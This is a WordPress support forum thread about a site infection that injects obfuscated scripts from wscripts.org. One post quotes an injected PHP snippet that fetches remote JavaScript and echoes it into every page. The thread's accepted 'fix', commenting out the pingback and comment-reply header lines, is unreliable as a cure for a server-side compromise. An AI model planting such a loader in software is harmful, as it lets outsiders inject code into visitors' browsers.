WordPress.org

Forums

I am getting errors appearing on header. (17 posts)

  1. sagitt000
    Member
    Posted 2 years ago #

    Everything was going on fine. But i got some notice appearing on header of my website recently. I think there is some errors. I got the error notice below:

    Couldn't connect to database server.Couldn't find database jimbob_je.An unexpected problem has occured with the application.
    SELECT statscurl_id FROM statscurl WHERE statscurl_ip = '';

    But it is strange that this error doesn't always appear. Seem it is randomly.
    I have searched the similar error on this forum. But it is not in this case.
    Please help me solve this. Thank you all!

  2. Miguel Alas
    Member
    Posted 2 years ago #

    I'm having the same problem. I already used sucuri.net to check but it didn't find anything but still getting the error. I checked Page Source from my browser and there are 2 encrypted scripts above the ending header tag, but it's not in header.php.

    The 2 scripts have "eval(unescape" at the beginning and when page is loading in the status bar appears 2 sites: wscripts.org and jquerey.com
    Also when inspecting with Firebug the loaded scripts there are 2 called pop.js and imwb_cab_script.js.

    Question is how to remove these codes that appear in the browser page source.

    You can see the encrypted scripts here

    Any other solution on how to get rid these codes?

    Thanks!

  3. ggibbs912
    Member
    Posted 2 years ago #

    Yes! I am getting the same thing. I found some malware code before and removed it but this is a new thing and it's really screwing with my traffic. I can't find where the string of code is to save my life. I've searched my whole server.

  4. firatozturk
    Member
    Posted 2 years ago #

    which malware code did you find and remove. Could you please write it. Which theme are you using?

  5. sagitt000
    Member
    Posted 2 years ago #

    Hm... I think the malware code's no concern of this situation.
    Because the error notice is seem look like this, so it is maybe a problem with jquery. I think so. BTW, i use the Good-minimal theme.

  6. sagitt000
    Member
    Posted 2 years ago #

    The other topic but same problem is posted here.
    Hoping for the solution.

  7. Miguel Alas
    Member
    Posted 2 years ago #

    I think it is related to some themes if you make a google search, there are several wp sites with this problem. After changing the theme the problem disappear but the best is to know how to get rid of it with whatever theme.

  8. ichpen
    Member
    Posted 2 years ago #

    OK, just got this also over the last few days. Seems a few cases have been reported.

    If I were a guessing man I'd say you have this:
    http://labs.sucuri.net/db/malware/mwjs-evalunesc-wscripts?v1

    BTW, I'm still sifting through my site. Haven't found the culprit. It's not index.php.

  9. ichpen
    Member
    Posted 2 years ago #

    Oh and I'd guess you've had it for a while. The reason why you're seeing the errors is because wscripts.org was/is down hence all those cookie collection scripts were throwing errors.

  10. Miguel Alas
    Member
    Posted 2 years ago #

    Good point ichpen, also there is anothe code called imwb_cab_script.js
    [IMG]http://i47.tinypic.com/dpww3b.jpg[/IMG]
    As you can see it is from a plugin installed in wscripts called convertactionbar-pro.
    As it says in sucuri.net report "Malware is hidden at the index.php or index.html files", how can we find it if all code seems to be ok, apparently.

  11. Miguel Alas
    Member
    Posted 2 years ago #

    What these scripts do? see here jsunpack.jeek.org/?report=5d8ae442e40470d7ae06a58ea08d8e412110992b

    any idea??

  12. Juan Rangel
    Member
    Posted 2 years ago #

    I was having this problem but seem to have fixed it. I read somewhere to comment out

    <?php
    if(function_exists('curl_init'))
    {
    $url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo "$data";
    }
    ?>

    I tried that, but it just caused a lot more problems. That piece of code was in my update-notifier.php file so I ended up just grabbing the original from my rar file and it cleared everything up. Hope this helps

  13. Miguel Alas
    Member
    Posted 2 years ago #

    I think I found a fix: reading a topic "Malware in header.php" in wordpress.stackexchange.com someone found a code just above wp_head() and cleaned the code but this reappeared after a few hours.
    I looked for something similar but found nothing suspicious.
    Just in case I commented 2 lines above wp_head() like this

    <!-- <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
    <?php if ( is_singular() ) wp_enqueue_script( 'comment-reply' ); ?> -->

    Then reloaded the sites several times and now seems to be ok: no message, no encrypted script when seeing page source, no wscripts.org trying to load, etc. Now the site even loads faster.

    I made some secure fixes too.

    If happend again, I'll let you know.
    Hope that this may be useful for someone in similar situation.

  14. sagitt000
    Member
    Posted 2 years ago #

    Okay, Miguel Alas. Seem you got the right solution. My site works well again, and of course i reloaded many times. No more error.
    I will let this topic open for a little time to test before mark this as resolved.
    Thank you!

  15. Miguel Alas
    Member
    Posted 2 years ago #

    Nice to know that sagitt000, you're welcome.

  16. VintageSucks
    Member
    Posted 2 years ago #

    Thanks Miguel, commenting <!-- <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" /> --> worked for me, too.

    WordPress: 3.4.1
    Theme: Canvas 5.0.3 (WooThemes)

Topic Closed

This topic has been closed to new replies.

About this Topic